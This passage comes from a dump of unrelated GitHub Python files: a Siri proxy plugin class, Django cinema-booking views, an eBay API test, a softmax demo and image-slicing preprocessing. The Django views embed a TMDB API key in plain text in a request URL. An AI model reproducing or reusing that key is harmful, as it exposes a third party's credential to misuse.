run()\n","repo_name":"LanternD/NB-Scope","sub_path":"Software/udp-server-for-nb-iot/udp_receive.py","file_name":"udp_receive.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"71021205609","text":"from types import GeneratorType\n\nfrom pysiriproxy.constants import Keys\nfrom pysiriproxy.plugins.speechRules import isSpeechRule, speechRuleMatches, \\\n matches\nfrom pysiriproxy.plugins.directions import isDirectionFilter, \\\n directionsMatch, From_iPhone, From_Server\nfrom pysiriproxy.plugins.objectClasses import isObjectClassFilter, \\\n objectClassesMatch, SpeechPacket, SpeechRecognized, StartRequest\n\nfrom pyamp.logging import Colors\nfrom pyamp.util import getStackTrace\n\n\nclass BasePlugin:\n '''The BasePlugin class encapsulates the basic features of a plugin.\n This class provides the ability to load the set of filter functions,\n and then process them with a received object and an received direction.\n\n A filter function is created by decorating a class function with either\n the From_iPhone decorator, or the From_Server decorator. These filters\n will be processed in the event that an object is received from the given\n decorated direction. These functions can have any publicly visible name\n (i.e., do not start with __).\n\n Example::\n\n def Plugin(BasePlugin):\n @From_iPhone\n def exampleFilter(self, obj):\n self.log.debug(\"This will process all iPhone objects!\")\n\n Filter functions can also be created to catch a specific object type by\n using specific object class decorators. The object class decorators are\n defined in the :mod:`.objectClasses` module.\n\n Example::\n\n def Plugin(BasePlugin):\n @StartRequest\n @From_iPhone\n def exampleFilter(self, obj):\n self.log.debug(\"This will process iPhone StartRequest objects!\")\n\n In the above example, the *exampleFilter* function will be called in the\n event that a StartRequest object is received from the iPhone. Custom\n decorators can be created by calling the\n :func:`.objectClasses.createDecorator` function.\n\n Speech rules are created in a similar manner to object filters. Two\n decorators exist which allow a speech rule function to be called in the\n event that a given string matches the recognized speech, or if a regular\n expression matches the recognized speech.\n\n Example::\n\n def Plugin(BasePlugin):\n @matches(\"Test Siri Proxy\")\n def testMatch(self, text):\n print \"Matched the recognized speech!\"\n\n @regex(\".*Siri Proxy.*\")\n def testRegex(self, text):\n print \"Matched a regular expression!\"\n\n The *@matches* decorator takes a string which it will compare to the\n recognized speech. A function using this decorator will be called in the\n event that the recognized speech matches the given string (it is case\n insensitive).\n\n The *@regex* decorator takes a regular expression which will use to\n match the recognized speech. A function using this decorator will be\n called in the event that the regular expression matches the recognized\n speech (it is case insensitive).\n\n Custom speech rule decorators can be created by creating a subclass of the\n :class:`.speechRules.Rule` class, and then calling the\n :func:`.speechRules.createDecorator` function with the \n :class:`.speechRules.Rule` subclass.\n\n '''\n\n customCommandMap = {}\n '''The customCommandMap property defines a dictionary of custom command\n names mapped to the concrete plugin class function names that get called\n when the custom command is received from the iPhone.\n\n '''\n\n # Store the names of various properties that concrete plugins can override\n __NameProp = \"name\"\n __LogColorProp = \"logColor\"\n\n def __init__(self, manager, logger):\n '''\n * manager -- The PluginManager object\n * logger -- The logger\n\n '''\n self.__manager = manager\n\n # Force the name property to exist\n name = self.__forceProperty(self.__NameProp)\n\n # Get the logColor property which is optional\n logColor = self.__getProperty(self.__LogColorProp,\n Colors.Foreground.White)\n\n self.log = logger.get(name, color=logColor)\n self.__clearFilters()\n self.__clearSpeechRules()\n\n # Load the filters and speech rules for this plugin\n self.__loadFiltersAndRules()\n\n self.init()\n\n def getName(self):\n '''Get the name of this Plugin.'''\n return self.__getProperty(self.__NameProp)\n\n ##### Functions concrete plugins should override #####\n\n def init(self):\n '''Called after the BasePlugin is created.\n\n .. note:: This function can be overridden by concrete plugins.\n\n '''\n pass\n\n ##### Process filters for this plugin #####\n\n def processFilters(self, obj, direction):\n '''Process the filters for this Plugin.\n\n .. note:: This function should return False if the object should be\n dropped, return None if the object is ignored by this\n filter, or return the new object corresponding to the\n response.\n\n * commandName -- The name of the object\n * direction -- The direction the object traveled to be received\n\n '''\n self.log.debug(\"Processing %d filters\" % len(self.__filters), level=10)\n\n # Process all of the filters for this plugin\n for filterFunction in self.__filters:\n # Determine if this filter function applies to the current\n # object or direction\n if self.__filterApplies(filterFunction, direction, obj):\n # Filters return None when they ignore the object, otherwise\n # they have some effect on the current object\n try:\n filterName = filterFunction.__name__\n self.log.debug(\"Processing filter: %s\" % filterName,\n level=10)\n\n response = filterFunction(obj, direction)\n if response is not None:\n return response\n except:\n self.log.error(\"Error in filter [%s]\" % \\\n filterFunction.__name__)\n self.log.error(getStackTrace())\n\n # Object is ignored by this plugin\n return None\n\n @From_iPhone\n @StartRequest\n def customCommand(self, obj, direction):\n '''Create a default object filter for the start request command\n received from the iPhone. This allows the plugins to define a set\n of custom command names and map them to specific callback functions.\n\n * commandName -- The name of the object\n * direction -- The direction the object traveled to be received\n\n '''\n # Get the command name from the start request object\n commandName = self.__getStartRequestCommand(obj)\n\n functionName = self.customCommandMap.get(commandName)\n\n if functionName is not None:\n customFn = getattr(self, functionName, None)\n if customFn is not None:\n return customFn(obj)\n\n return None\n\n ##### Functions for processing speech rules #####\n\n def processSpeechRules(self, text):\n '''Process all of the speech rules for the recognized speech text.\n\n * text -- The recognized speech text\n\n '''\n self.log.debug(\"Processing %d speech rules for [%s]\" % \\\n (len(self.__speechRules), text), level=10)\n\n # Process all of the speech rules for this plugin\n for ruleFunction in self.__speechRules:\n # If the given speech rule applies, then apply\n # it to the given text\n if self.__speechRuleApplies(ruleFunction, text):\n try:\n self.log.debug(\"Processing speech rule: %s\" % \\\n ruleFunction.__name__, level=10)\n\n # Speech rule functions have no return value, make sure\n # to pass it the lowercase version of the text\n resp = ruleFunction(text.lower())\n\n # Only apply the first matched speech rule\n return True if type(resp) != GeneratorType else resp\n except:\n self.log.error(\"Error in speech rule [%s]\" % \\\n ruleFunction.__name__)\n self.log.error(getStackTrace())\n\n # The text was not matched by any speech rules\n return False\n\n ##### Functions passed through to the PluginManager #####\n\n def showDirections(self, directionsType, source, destination,\n utterance=None):\n '''Create a directions object and display it to the iPhone user.\n\n * directionsType -- The type of directions to show\n * source -- The starting location\n * destination -- The destination location\n * utterance -- The utterance to include\n\n '''\n self.__manager.showDirections(directionsType, source, destination,\n utterance=utterance)\n\n def showDrivingDirections(self, source, destination, utterance=None):\n '''Create driving directions object and display it to the iPhone user.\n\n * source -- The starting location\n * destination -- The destination location\n * utterance -- The utterance to include\n\n '''\n self.__manager.showDrivingDirections(source, destination,\n utterance=utterance)\n\n def showWalkingDirections(self, source, destination, utterance=None):\n '''Create walking directions object and display it to the iPhone user.\n\n * source -- The starting location\n * destination -- The destination location\n * utterance -- The utterance to include\n\n '''\n self.__manager.showWalkingDirections(source, destination,\n utterance=utterance)\n\n def showPublicTransitDirections(self, source, destination, utterance=None):\n '''Create public tranportation directions object and display it to\n the iPhone user.\n\n * source -- The starting location\n * destination -- The destination location\n * utterance -- The utterance to include\n\n '''\n self.__manager.showPublicTransitDirections(source, destination,\n utterance=utterance)\n\n def makeView(self, views):\n '''Create a view and send it to the iPhone user.\n\n * views -- The list of views to create\n\n '''\n self.__manager.makeView(views)\n\n def ask(self, question, spoken=None):\n '''Command Siri to ask the user a question.\n\n * question -- The question to ask\n * spoken -- The text Siri will say\n\n '''\n self.__manager.ask(question, spoken)\n\n def resetContext(self):\n '''Reset the context.'''\n self.__manager.resetContext()\n\n def say(self, text, spoken=None):\n '''Command Siri to speak a piece of text.\n\n * text -- The text that Siri will display\n * spoken -- The text that Siri will speak\n\n '''\n self.__manager.say(text, spoken)\n\n def completeRequest(self):\n '''Complete a request to Siri.\n\n .. note:: This function should always be called by speech rules\n otherwise Siri will continue to spin.\n\n '''\n self.__manager.completeRequest()\n\n ##### Private functions for loading filters #####\n\n def __clearFilters(self):\n '''Clear the filters for this plugin.'''\n self.__filters = []\n\n def __clearSpeechRules(self):\n '''Clear the speech rules for this plugin.'''\n self.__speechRules = []\n\n def __loadFiltersAndRules(self):\n '''Load all of the filters and speech rules for this Plugin.'''\n self.__clearFilters()\n self.__clearSpeechRules()\n\n # Traverse all of our functions\n for function in self.__getFunctions():\n # Handle a filter, or speech rule function accordingly\n if isDirectionFilter(function) or isObjectClassFilter(function):\n self.log.debug(\"Added filter [%s]\" % function.__name__,\n level=10)\n self.__filters.append(function)\n elif isSpeechRule(function):\n self.log.debug(\"Added speech rule [%s]\" % function.__name__,\n level=10)\n self.__speechRules.append(function)\n\n ##### Other private functions #####\n\n def __getFunctions(self):\n '''Return all of the functions for this class.'''\n # Filter out any builtin, and private functions\n attrs = filter(self.__isNotPrivateOrBuiltin, dir(self))\n\n # Get the objects for all of the class attributes\n objs = map(lambda attr: getattr(self, attr, None), attrs)\n\n # Filter out any non-existing attributes\n objs = filter(lambda obj: obj is not None, objs)\n\n # Now return only those that are functions\n return filter(lambda obj: hasattr(obj, \"__call__\"), objs)\n\n def __isNotPrivateOrBuiltin(self, attr):\n '''Determine if the given attribute is a private or builtin\n attribute name.\n\n * attr -- The name of the attribute\n\n '''\n return not attr.startswith(\"_\") and not attr.find(\"__\") != -1\n\n def __forceProperty(self, propName):\n '''Force the given property to exist.\n\n * propName -- The name of the property\n\n '''\n propValue = self.__getProperty(propName)\n\n # Check that the name property exists\n if propValue is None:\n raise Exception(\"Plugins must have a '%s' property!\" % propName)\n\n return propValue\n\n def __getProperty(self, propName, default=None):\n '''Get the value of the given property.\n \n * default -- The default value\n\n '''\n return getattr(self, propName, default)\n\n def __filterApplies(self, function, direction, obj):\n '''Determine if the given filter function applies to either the\n given direction or the class of the given object.\n\n * direction -- The direction\n * obj -- The object\n\n '''\n objectClass = obj.get('class')\n return directionsMatch(function, direction) and \\\n objectClassesMatch(function, objectClass)\n\n def __speechRuleApplies(self, function, text):\n '''Determine if the given speech rule function applies to\n the recognized text.\n\n * function -- The speech rule function\n * text -- The recognized text\n\n '''\n return speechRuleMatches(function, text)\n\n def __getStartRequestCommand(self, obj):\n '''Get the command name from the start request object.\n\n * obj -- The start request object\n\n '''\n utterance = None\n properties = obj.get(Keys.Properties)\n if properties is not None:\n utterance = properties.get(Keys.Utterance)\n\n return utterance\n","repo_name":"bponsler/pysiriproxy","sub_path":"pysiriproxy/plugins/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":15076,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"8002511979","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom django.template import loader\nfrom home.models import Film, Showing, Ticket, Booking, TicketTypeQuantity\nfrom home.forms import BookingForm\nimport requests\nimport json\n\n# Create your views here.\ndef booking(request):\n if 'showing' not in request.GET:\n return redirect('/')\n\n # Get showing\n showing_id = request.GET['showing']\n showing = Showing.objects.get(id=showing_id)\n\n # Form submission\n if request.method == 'POST':\n form = BookingForm(request.POST, available_tickets=Ticket.objects.all())\n\n if form.is_valid():\n # Further validation \n # Check if there are enough seats + Seats > 0\n total_tickets = 0\n for field_name, quantity in form.cleaned_data.items():\n if field_name.startswith('ticket_'):\n total_tickets += quantity\n\n if total_tickets > showing.seats:\n form.add_error(None, 'Not enough seats available.')\n return render(request, 'booking.html', {'form': form, 'showing': showing})\n\n elif total_tickets == 0:\n form.add_error(None, 'You must select at least one ticket.')\n return render(request, 'booking.html', {'form': form, 'showing': showing})\n\n booking = Booking.objects.create(\n showing=showing,\n customer_name=form.cleaned_data['customer_name'],\n customer_email=form.cleaned_data['customer_email'],\n )\n \n # Create ticket type quantities for each ticket type the user booked\n for field_name, quantity in form.cleaned_data.items():\n if field_name.startswith('ticket_'):\n ticket_id = field_name.split('_')[1]\n ticket = Ticket.objects.get(id=ticket_id)\n ttq = TicketTypeQuantity.objects.create(ticket=ticket, quantity=quantity)\n booking.ticket_type_quantities.add(ttq)\n\n # Update showing seats & save booking\n showing.seats -= total_tickets\n showing.save()\n booking.save()\n return render(request, 'booking-confirmation.html', {'booking': booking})\n else:\n form = BookingForm(available_tickets=Ticket.objects.all())\n return render(request, 'booking.html', {'form': form, 'showing': showing})\n \n else: \n form = BookingForm(available_tickets=Ticket.objects.all())\n return render(request, 'booking.html', {'form': form, 'showing': showing})\n\n\ndef home(request):\n template = loader.get_template('home.html')\n\n # MAKE TEMP DATA\n makeExamples()\n\n films = Film.objects.all().prefetch_related('showings')\n \n # Get film posters by IMDB ID using an API\n for film in films:\n response = requests.get(f'https://api.themoviedb.org/3/find/{film.imdb}?api_key=d4c4c2d25e196ead918fc7080850a0d7&language=en-US&external_source=imdb_id')\n data = response.json()\n for category in data.keys():\n if len(data[category]) > 0:\n film.image_url = f\"https://image.tmdb.org/t/p/original{data[category][0]['poster_path']}\"\n film.backdrop_url = f\"https://image.tmdb.org/t/p/original{data[category][0]['backdrop_path']}\"\n film.save()\n\n # Serialize films\n serialized_films = [film_serializable(film) for film in films]\n context = {\n 'films': serialized_films,\n }\n\n return render(request, 'home.html', context)\n\n\ndef film_serializable(film):\n # Serialize the showings\n serialized_showings = [showing_serializable(showing) for showing in film.showings.all()]\n\n return {\n 'title': film.title,\n 'description': film.description,\n 'duration': film.duration,\n 'age_rating': film.age_rating,\n 'image_url': film.image_url,\n 'showings': serialized_showings,\n }\n\n\ndef showing_serializable(showing):\n return {\n 'id': showing.id,\n 'date': showing.date.strftime('%Y-%m-%d'),\n 'time': showing.time.strftime('%H:%M'),\n 'seats': showing.seats\n }\n\n\ndef makeExamples(): \n # Delete all data before making new\n Film.objects.all().delete()\n Showing.objects.all().delete()\n Ticket.objects.all().delete()\n Booking.objects.all().delete()\n\n # Create tickets\n tickets = [\n Ticket(name=\"Adult\", price=7.50),\n Ticket(name=\"Child\", price=3.00),\n Ticket(name=\"Student\", price=5.00),\n ]\n\n Ticket.objects.bulk_create(tickets)\n\n # Create film + showings\n film = Film(title=\"The Owl House\", description=\"The Owl House follows Luz, a self-assured teenage girl who accidentally stumbles upon a portal to a magical world where she befriends a rebellious witch, Eda, and an adorably tiny warrior, King.\",\n duration=23, age_rating=9, imdb=\"tt8050756\")\n film.save()\n\n # Create list of showings\n showings = [\n Showing(film=film, date='2023-01-01', time='20:00', seats=60, screen=1),\n Showing(film=film, date='2023-01-02', time='16:00', seats=80, screen=2),\n Showing(film=film, date='2023-01-02', time='18:00', seats=20, screen=1),\n ]\n\n Showing.objects.bulk_create(showings)\n\n film = Film(title=\"Strange World\", description=\"The original action-adventure journeys deep into an uncharted and treacherous land where fantastical creatures await the legendary Clades, a family of explorers whose differences threaten to topple their latest - and by far - most crucial mission.\",\n duration=102, age_rating=12, imdb=\"tt10298840\")\n film.save()\n\n # Create list of showings\n showings = [\n Showing(film=film, date='2023-01-01', time='20:00', seats=100, screen=1),\n Showing(film=film, date='2023-01-01', time='21:00', seats=90, screen=2),\n ]\n\n Showing.objects.bulk_create(showings)\n \n film = Film(title=\"Glass Onion: A Knives Out Mystery\", description=\"Tech billionaire Miles Bron invites his friends for a getaway on his private Greek island. When someone turns up dead, Detective Benoit Blanc is put on the case.\",\n duration=139, age_rating=12, imdb=\"tt11564570\")\n film.save()\n\n showings = [\n Showing(film=film, date='2023-01-05', time='09:00', seats=100, screen=1),\n Showing(film=film, date='2023-01-05', time='12:00', seats=100, screen=1),\n ]\n Showing.objects.bulk_create(showings)\n\n film = Film(title=\"John Wick: Chapter 4\", description=\"John Wick uncovers a path to defeating The High Table. But before he can earn his freedom, Wick must face off against a new enemy with powerful alliances across the globe and forces that turn old friends into foes.\",\n duration=200, age_rating=14, imdb=\"tt10366206\")\n film.save()\n\n showings = [\n Showing(film=film, date='2023-01-05', time='10:00', seats=50, screen=3),\n ]\n Showing.objects.bulk_create(showings)\n\n film = Film(title=\"Top Gun: Maverick\", description=\"After thirty years, Maverick is still pushing the envelope as a top naval aviator, but must confront ghosts of his past when he leads TOP GUN's elite graduates on a mission that demands the ultimate sacrifice from those chosen to fly it.\",\n duration=130, age_rating=12, imdb=\"tt1745960\")\n film.save()\n\n showings = [\n Showing(film=film, date='2023-01-05', time='16:00', seats=20, screen=20),\n Showing(film=film, date='2023-01-06', time='16:00', seats=20, screen=20),\n Showing(film=film, date='2023-01-07', time='16:00', seats=50, screen=20),\n\n\n ]\n Showing.objects.bulk_create(showings)\n\n film = Film(title=\"The Batman\", description=\"When a sadistic serial killer begins murdering key political figures in Gotham, Batman is forced to investigate the city's hidden corruption and question his family's involvement.\",\n duration=176, age_rating=15, imdb=\"tt1877830\")\n film.save()\n\n showings = [\n Showing(film=film, date='2023-01-06', time='20:00', seats=60, screen=1),\n Showing(film=film, date='2023-01-07', time='16:00', seats=80, screen=2),\n Showing(film=film, date='2023-01-07', time='18:00', seats=20, screen=1),\n\n\n ]\n Showing.objects.bulk_create(showings)\n\n film = Film(title=\"Arcane\", description=\"Set in utopian Piltover and the oppressed underground of Zaun, the story follows the origins of two iconic League champions-and the power that will tear them apart.\",\n duration=360, age_rating=15, imdb=\"tt11126994\")\n film.save()\n\n showings = [\n Showing(film=film, date='2023-01-12', time='20:00', seats=60, screen=1),\n Showing(film=film, date='2023-01-12', time='16:00', seats=80, screen=2),\n ]\n Showing.objects.bulk_create(showings)\n\n film = Film(title=\"Wednesday\", description=\"Follows Wednesday Addams' years as a student, when she attempts to master her emerging psychic ability, thwart and solve the mystery that embroiled her parents.\",\n duration=360, age_rating=12, imdb=\"tt13443470\")\n film.save()\n\n showings = [\n Showing(film=film, date='2023-01-13', time='10:00', seats=60, screen=1),\n Showing(film=film, date='2023-01-13', time='14:00', seats=80, screen=2),\n ]\n Showing.objects.bulk_create(showings)\n","repo_name":"KayleeWilliams/UWEFlix","sub_path":"UWEFlix/home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21419484158","text":"#this module is just to load the api key out of my .env file\n\nimport datetime\n\nimport os\nfrom ebaysdk.finding import Connection \nfrom ebaysdk.exception import ConnectionError\nfrom dotenv import load_dotenv\nload_dotenv()\nAPI_KEY= os.getenv('api_key')\n\n\nclass Ebay_22(object):\n def __init__(self, API_KEY):\n self.api_key = API_KEY\n \n def fetch(self):\n try:\n # the domain is on the sandbox version!! not the production sandbox is just for testing \n api = Connection(domain = 'svcs.sandbox.ebay.com',appid=self.api_key, config_file=None)\n response = api.execute('findItemsAdvanced', {'keywords': 'legos'})\n print (response.reply)\n # print the results of the response list\n for item in response.reply.searchResult.item:\n print(f\"Title: {item.title}, Price: {item.sellingStatus.currentPrice.value}\")\n print(f\"Condition: {item.condition.conditionDisplayName}\")\n print(f\"Buy it now available: {item.listingInfo.buyItNowAvailable}\")\n #print(f\"Product ID: {item.productId}\") #dies wird interessant, sobald ich auf der production site bin\n \n #some basic AssertioError Tests: if not working --> assertionError\n assert(response.reply.ack == 'Success')\n assert(type(response.reply.timestamp) == datetime.datetime)\n assert(type(response.reply.searchResult.item) == list)\n\n item = response.reply.searchResult.item[0]\n assert(type(item.listingInfo.endTime) == datetime.datetime)\n assert(type(response.dict()) == dict)\n\n except ConnectionError as e:\n print(e)\n print(e.response.dict())\n\n\n def parse(self):\n pass\n\n\n#main driver\n\nif __name__ == '__main__':\n e = Ebay_22(API_KEY)\n e.fetch()\n e.parse()\n\n\n","repo_name":"h3g091/ebay-search-api","sub_path":"build_connection_and_test_api.py","file_name":"build_connection_and_test_api.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24232271835","text":"nums=[5,7,7,8,8,10]\n\ndef get1(n,target):\n dict={}\n for i in nums:\n if i not in dict:\n dict[i]=1\n else:\n dict[i]+=1\n if target in dict:\n return dict[target]\n else:\n return 0\n\nprint(get1(nums,8))\n\n","repo_name":"liucheng2912/py","sub_path":"leecode/easy/2004/53排序数组中查找数字i出现的次数.py","file_name":"53排序数组中查找数字i出现的次数.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40911885790","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n'''\n@Project :Pytorch-UNet \n@File :dataprocess.py\n@Author :kuisu\n@Email :kuisu_dgut@163.com\n@Date :2022/3/23 18:44 \n'''\n#将原始图像,和二至分割图像数据进行匹配, 并保存到data文件中\nimport os\nfrom PIL import Image\nimport numpy as np\nimport cv2\nfrom tqdm import tqdm\n\n#将大图通过滑窗方式截取为小图\ndef sliceImage(image_path,output_file_name,output_dir):\n from sahi.slicing import slice_image\n slice_image_result, num_total_invalid_segmentation = slice_image(\n image=image_path,\n output_file_name=output_file_name,\n output_dir=output_dir,\n slice_height=256,\n slice_width=256,\n overlap_height_ratio=0.2,\n overlap_width_ratio=0.2,\n verbose=True\n )\n return slice_image_result,num_total_invalid_segmentation\n\n\ndef match_data(train_dir,mask_dir):\n #将mask和origin_img进行匹配\n count1,count2,count3,count4 = 0,0,0,0\n for image_name in tqdm(os.listdir(mask_dir)):\n if os.path.exists(os.path.join(train_dir, image_name)):\n mask = Image.open(os.path.join(mask_dir,image_name))\n image = Image.open(os.path.join(train_dir,image_name))\n mask = mask.copy().convert(\"L\")\n mask = mask.copy().convert(\"1\")\n mask = np.array(mask,dtype=np.uint8)*255\n if mask.max() == 255:\n mask_img = Image.fromarray(mask)\n mask_img.save(os.path.join(\"./data/masks/\",\"{}_mask.png\".format(image_name.split(\".\")[0])))\n image.save(os.path.join(\"./data/imgs\",\"{}.png\".format(image_name.split(\".\")[0])))\n if 'img1' in image_name:\n count1+=1\n elif \"img2\" in image_name:\n count2+=1\n elif \"img3\" in image_name:\n count3+=1\n elif \"img4\" in image_name:\n count4+=1\n else:\n print(\"{} not in train_dir\".format(image_name))\n print(\"img1: {}, img2:{}, img3: {}, img4:{}\".format(count1,count2,count3,count4))\n\n# 将tif格式转为png\ndef tif2jpg(path,save_path):\n tif_list = [x for x in os.listdir(path) if x.endswith(\".tif\")] # 获取目录中所有tif格式图像列表\n for num,i in enumerate(tif_list): # 遍历列表\n tifPath = os.path.join(path,i)\n lbp_1_8_real = cv2.imread(tifPath,-1)\n if \"mask\" in i:\n lbp_1_8_real*=255\n # 读取列表中的tif图像\n #转换为0-255\n img_norm = np.zeros_like(lbp_1_8_real)\n real_show = cv2.normalize(lbp_1_8_real, dst=img_norm, alpha=0, beta=255, norm_type=cv2.NORM_MINMAX)\n save_image_path = os.path.join(save_path,i.split('.')[0]+\".jpg\")\n cv2.imwrite(save_image_path,real_show) # tif 格式转 jpg 并按原名称命名, 保存为灰度图\n\nif __name__ == '__main__':\n\n ## 1. 将tif转为png\n # path = r\"D:\\dataset\\BGI_EXAM\\train_set\" # 获取代码所在目录\n # save_path = r\"D:\\dataset\\BGI_EXAM\\train_set\"\n # tif2jpg(path,save_path)\n\n\n # # 2. 滑窗截取小图,并过滤背景为空的mask\n # image_path = r\"D:\\dataset\\BGI_EXAM\\test_set\\171.jpg\"\n # output_file_name = \"171\"\n # output_dir = r\"D:\\dataset\\BGI_EXAM\\slices\\test\"\n # sliceImage(image_path, output_file_name, output_dir)\n\n # #3. 将截取mask和origin_image进行匹配\n # train_dir = r\"D:\\dataset\\BGI_EXAM\\slices\\train2\"\n # mask_dir = r\"D:\\dataset\\BGI_EXAM\\slices\\mask2\"\n # match_data(train_dir,mask_dir)\n pass\n","repo_name":"kuisu-GDUT/pytorch-cell-UNet","sub_path":"dataprocess.py","file_name":"dataprocess.py","file_ext":"py","file_size_in_byte":3565,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"72667066728","text":"text = input('Введите число в экспотенциальной форме: ')\nm = ''\nb = ''\nflag = True\nfor i in text:\n if i == 'e' or i == 'E':\n flag = False\n elif flag:\n m += i\n else:\n b += i\nprint(m, b)","repo_name":"chernyssshev/Skillbox","sub_path":"Skillbox/13. float 2/Практика/13.6 (4).py","file_name":"13.6 (4).py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43559542538","text":"# anta....tica는 반드시 포함됨 -> a, n, t, i, c 5개는 무조건 알고 있어야 함\n\n# 단어의 개수(N)는 50 이하-> 2^50\n# K는 0이상 26이하 -> 5보다 작으면 무조건 결과가 0임\n# 5개 숫자를 모두 제거함 -> 0이상 21이하로 줄어듦\n# -> 조합의 개수가 최대가 21C10 = 352716 -> 해볼만함\n# 352716 * 50 = 1763만\n\n# 전체 set 중에서 숫자 몇개만 고르기 -> 이 숫자 안에 다 들어가는지?\n\n\n# 시간 초과... ㅠㅠㅠㅠㅠ -> itertools를 이용하지 않고 하는 방법..?\n\n\nimport sys\nfrom itertools import combinations\n\n\nnums = sys.stdin.readline().split(\" \")\nword_num = int(nums[0])\nletter_num = int(nums[1])\n\nwords = [\"\"]*(word_num)\ntotal_word = \"\"\n\nfor i in range(word_num):\n word = sys.stdin.readline().replace(\"\\n\", \"\").replace(\"a\", \"\").replace(\"n\", \"\").replace(\"t\", \"\").replace(\"i\", \"\").replace(\"c\", \"\")\n words[i] = words[i] + word\n total_word = total_word + word\n\n\nprint(words)\n\ndef max_word_count(total_word, words, letter_num):\n\n # print(letter_num)\n\n if (letter_num < 5):\n return 0\n\n letter_set = set(total_word) # 전체 알파벳\n\n word_counts = []\n\n\n\n for combi in combinations(letter_set, letter_num-5):\n\n count = 0\n\n for word in words:\n # print(combi)\n # print(word)\n\n\n if (set(word) & set(combi) == set(word)):\n count += 1\n\n\n word_counts.append(count)\n\n return max(word_counts)\n\n\nprint(max_word_count(total_word, words, letter_num))\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Qkite/coding-test-study","sub_path":"pccp_practice/가르침.py","file_name":"가르침.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34687352215","text":"# chao\n# 时间:2023/11/28 15:16\n# softmax回归的简单实现\n\nimport torch\nfrom torch import nn\nfrom d2l import torch as d2l\n\nbatch_size = 256\ntrain_iter, test_iter = d2l.load_data_fashion_mnist(batch_size)\n\n# 定义网络模型,在线性层之前添加另一个展平层:Flatten,用于调整网络输入的形状\nnet = nn.Sequential(\n nn.Flatten(),\n nn.Linear(784, 10)\n)\n\n# 定义初始化权重方法\ndef init_weights(m):\n '''\n\n :param m: m代表一个模块\n :return:\n '''\n if type(m) == nn.Linear: # 如果模块m属于Linear类型,则初始化m的weight\n nn.init.normal_(m.weight, mean=0, std=0.01) # nn中初始化权重的方法,传入需要初始化的张量、均值(默认为0)和标准差(默认1.0)\n\nnet.apply(init_weights)\n\n# 定义损失交叉熵函数\nloss = nn.CrossEntropyLoss(reduction='none') # reduction是指定损失的计算方式,none返回的是每个样本的交叉熵损失值\n\n# 定义优化算法\ntrainer = torch.optim.SGD(net.parameters(), lr=0.1)\n\n# 训练\nnum_epochs = 3\n# 保存了定义的方法,但是调用时找不到\n# d2l.train_ch3(net, train_iter, test_iter, loss, num_epochs, trainer)\n","repo_name":"Oceandkb/DLdemo","sub_path":"learning/Regression/softmax_regression_simple.py","file_name":"softmax_regression_simple.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16490225937","text":"from django.db.models import (\n CASCADE,\n BooleanField,\n ForeignKey,\n)\nfrom utils.models import (\n ProjectModel,\n)\n\n\nclass Vote(ProjectModel):\n \"\"\"\n Отметка пользователя\n \"\"\"\n\n is_like = BooleanField('Положительная отметка пользователя', default=False)\n\n user = ForeignKey('users.CustomUser', verbose_name='Пользователь', on_delete=CASCADE)\n recipe = ForeignKey('recipes.Recipe', verbose_name='Рецепт', on_delete=CASCADE)\n\n class Meta:\n db_table = 'recommendations_vote'\n verbose_name = 'Отметка пользователя'\n verbose_name_plural = 'Отметки пользователей'\n","repo_name":"sandanilenko/peerocks","sub_path":"peerocks/peerocks/apps/services/recommendations/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36413385339","text":"import d2lzh as d2l\nfrom mxnet import autograd, nd\ndef xyplot(x_vals, y_vals, name):\n d2l.set_figsize(figsize = (5, 2.5));\n d2l.plt.plot(x_vals.asnumpy(), y_vals.asnumpy());\n d2l.plt.xlabel(\"x\");\n d2l.plt.ylabel(\"name\" + \"(x)\");\n d2l.plt.show()\n\nx = nd.arange(-8.0, 8.0, 0.1);\nx.attach_grad()\nwith autograd.record():\n y = x.relu();\nxyplot(x, y, \"ReLU\")\n","repo_name":"duanbing/DLNotes","sub_path":"example/mxnet/3.8.2_relu.py","file_name":"3.8.2_relu.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"21820764803","text":"#!/usr/bin/env python\n# -*- coding: utf-8\n\nfrom goobi.goobi_step import Step\nimport tools.tools as tools\nimport tools.limb as limb_tools\nimport os, time\n\nclass WaitForLimb( Step ):\n\n def setup(self):\n self.name = 'Vent på output-filer fra LIMB'\n self.config_main_section = 'limb_output'\n self.folder_structure_section = 'process_folder_structure'\n self.valid_exts_section = 'valid_file_exts'\n self.essential_config_sections.update([self.folder_structure_section, \n self.valid_exts_section] )\n self.essential_commandlines = {\n 'process_id' : 'number',\n 'process_path' : 'folder',\n 'auto_report_problem' : 'string',\n 'step_id' : 'number'\n }\n def getVariables(self):\n '''\n We need the limb_output folder,\n the location of the toc file\n Throws error if any directories are missing\n or if our retry vals are not numbers\n '''\n process_title = self.command_line.process_title\n limb = self.getConfigItem('limb_output')\n alto = self.getConfigItem('alto')\n toc = self.getConfigItem('toc')\n pdf = 